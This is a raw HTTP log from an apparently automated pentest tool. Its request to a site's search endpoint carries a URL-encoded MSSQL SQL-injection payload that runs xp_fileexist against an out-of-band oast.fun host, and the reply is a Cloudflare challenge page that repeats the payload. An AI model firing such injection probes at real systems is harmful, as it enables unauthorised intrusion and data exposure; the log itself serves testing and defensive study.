REQUEST:
GET https://my.myfirst.tech/search?query=%27%3B%20DECLARE%20%40q%20VARCHAR%2899%29%3B%20SET%20%40q%3D%27%5C%5Ch0cqg45t8jh21623dc0zymw6x3adanc5i.oast.fun%5Ca%27%3B%20EXEC%20master.dbo.xp_fileexist%20%40q%3B--%20-
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:38:31 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9875
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8462fbec0a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=ucdWbuTiTuhOElmkgsEiY7PKjm%2BTT%2FexCfb%2F2Nzcit2t69sToaqGdNpgIoiMAmUm2G3GO0CFKbjA0K8FI2JgIK5i9XZojPTFTkHMCI1tMcF4DYLSDnVXsvN3M6%2Fc54BQTom%2FgZK7e2bQvvfJ4w%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8462fbec0a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'DFOSDkhDNmD5atBSQ4BWLcjLcGWzqIZmoE3.HYxsNdM-1784281111-1.2.1.1-ClzN_8nzz6XGxnYjMpEhgXCg_vbaHdxAljnqRYnu51H1n6Zav0rojVoKRoYZwKmn',cITimeS: '1784281111',cRay: 'a1c8462fbec0a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?query=%27%3B+DECLARE+%40q+VARCHAR%2899%29%3B+SET+%40q%3D%27%5C%5Ch0cqg45t8jh21623dc0zymw6x3adanc5i.oast.fun%5Ca%27%3B+EXEC+master.dbo.xp_fileexist+%40q%3B--+-\u0026__cf_chl_tk=auQa2uP2vLOjhY7jL59F__bmeZMeXfK8y2E4nrCAUwI-1784281111-1.0.1.1-dI9YRqPr.KdZMleAXmt3LKAFk9hzoPqAMf8eqoLUKEQ",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?query=%27%3B+DECLARE+%40q+VARCHAR%2899%29%3B+SET+%40q%3D%27%5C%5Ch0cqg45t8jh21623dc0zymw6x3adanc5i.oast.fun%5Ca%27%3B+EXEC+master.dbo.xp_fileexist+%40q%3B--+-\u0026__cf_chl_f_tk=auQa2uP2vLOjhY7jL59F__bmeZMeXfK8y2E4nrCAUwI-1784281111-1.0.1.1-dI9YRqPr.KdZMleAXmt3LKAFk9hzoPqAMf8eqoLUKEQ",md: 'S3UiGZRcHwBZZXSqSIK4XME3VVvxjCXzxxMUGc8O9SU-1784281111-1.2.1.1-1d7Mbqugb5kRExkO0ijpYwgQcjrWI7sctz38jqLLhUsMkUgJPta_ALrci6utPRPYuz.cmv6kz.2jrfvqSwF_itgyi.2pynsjJPUcWtEuTK1GnRM5UKMIQ.yD.m0IlUd3bkGFhPiMOY4g7uFgK0BHdyOZp6sNY0ArnbrnyIyIWSifctb.IYdmmvEVCus0MJ8xlS7iNbkICnc9YVxl3rdJb.7fb5hp2tIE.xk_oANVTxkZX3rDjzKEnAQtPdNIRUGERWw2YwGnx134KKMGa4nY4OHTijOGovJ7W757acXQK.YNy5qRxX511yn2FWU0QbzPwwZ9bfn_MRDw5VVnNsc2yTwyFw_AQGk3SvYjjtS8616yxdIKajAaJEDyaeImlPjJpbIfKyR0dk9.vjjV9iaY8xadxzNHSCGikRlHLqx5D9SYJYhxS5q2G9nkfFHXTkgyX3VT6LB_m0id2JC3flS114Bq_oW3CxY4JK4GB5BCj.OJ54H5ACMKSWy84Jc5cXgZhv0j33t_9g.YTko5knI_8qx8D7H3lCkolrh44WQs6l4GtqWxKqEFyIlw8NmSLhavvKFUi91NA4_JO.xMT9.v6aJZVbFWPIksNjd2laxDS9vy42TC30TwHnB700EkHTxRVQnRlCTny9ehQ4MHBUTggXRHiavN0OOus9pHG8.vxmo.QYT8eoPZJ6JE5r25eQpJQPSBZtxPhkwO0V5EoGBtb1YwGaLQjqYCEw_swquues6a31WWR4CRiBVk0H5aVpIXomkb.Q82m7ActpAFiOkOBkiPqjLdMwW0gHVt.BoqPBh7TDJRAerRLtyGVHBLnzH3jaPF7mlU3Oc_VwSNRTrN9CXunzyg.jQP7XR51sddcPqRvSNkMQBOOEDZtRWFClIWK2jj7ywzjyBL9UHqERy2ZoXDO1QTzVaqfEWGxXUUt4Is7tuyyJk_OVVQ3KPBWVWsnCdGMmpl0q6nPQ1COZBw79Fjqu01Qudqr29794.uRjY4ew54leBumhIYQ3y1acMuolOg97fkeyNCA8G8GPbHh9q6mF4D2U7H2sX2F_d.NzJWNqvSOVJw95iifBZkrJ7FQWwgBisoLa7pX_jGzWLlu7cQZhsZJ.Q6KW.vOsAjcJtAyUb2bUxfwGWMyZnbiYhOnJwRMCHPguRUaP2yIX6bwzAkb0cyHY7wI7y1zB63v7trVMaGjcw8RTgqcXMt2HawPisGNCgMGBrAnCcT3lQzLM6uOOl2XtNxAsD5_FR_lf.eQVPyqLj9vZUKB0Uve94B4Tg_4LVPkGHjTB_wALepL4XnacAdu06amfa1Zov87xnwYzYa1Xn3Xv4DRIduIBywZt21Guv._U0irz3HAPTaxw',mdrd: 'VXnbuEo0zCqiR9d.K95jF7Pa5w_3SLCplje4IrSBRaM-1784281111-1.2.1.1-9ej.95QRk6OUabx.f_iq9uY86S3.FZppQc5FXh6fVszwm1bYL9ACwboiAdJeB9vnd_uY2FYnq7L67ZvGjROB0CAHikgXmKfs0InyGONVWpie1_.Pq6kNxNRPS97kKusSD3XrYKYDrycYEFEonZuusGVh7y7sbRqwj5fAAUznwoqVLstO3WSxyuDImwCpujIptTPjnlax4w0DGSYWsqByPZY5DRm04aOorAueQGp5X2GUN9kKFih2FERQG9n90.ej',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8462fbec0a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?query=%27%3B+DECLARE+%40q+VARCHAR%2899%29%3B+SET+%40q%3D%27%5C%5Ch0cqg45t8jh21623dc0zymw6x3adanc5i.oast.fun%5Ca%27%3B+EXEC+master.dbo.xp_fileexist+%40q%3B--+-\u0026__cf_chl_rt_tk=auQa2uP2vLOjhY7jL59F__bmeZMeXfK8y2E4nrCAUwI-1784281111-1.0.1.1-dI9YRqPr.KdZMleAXmt3LKAFk9hzoPqAMf8eqoLUKEQ"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
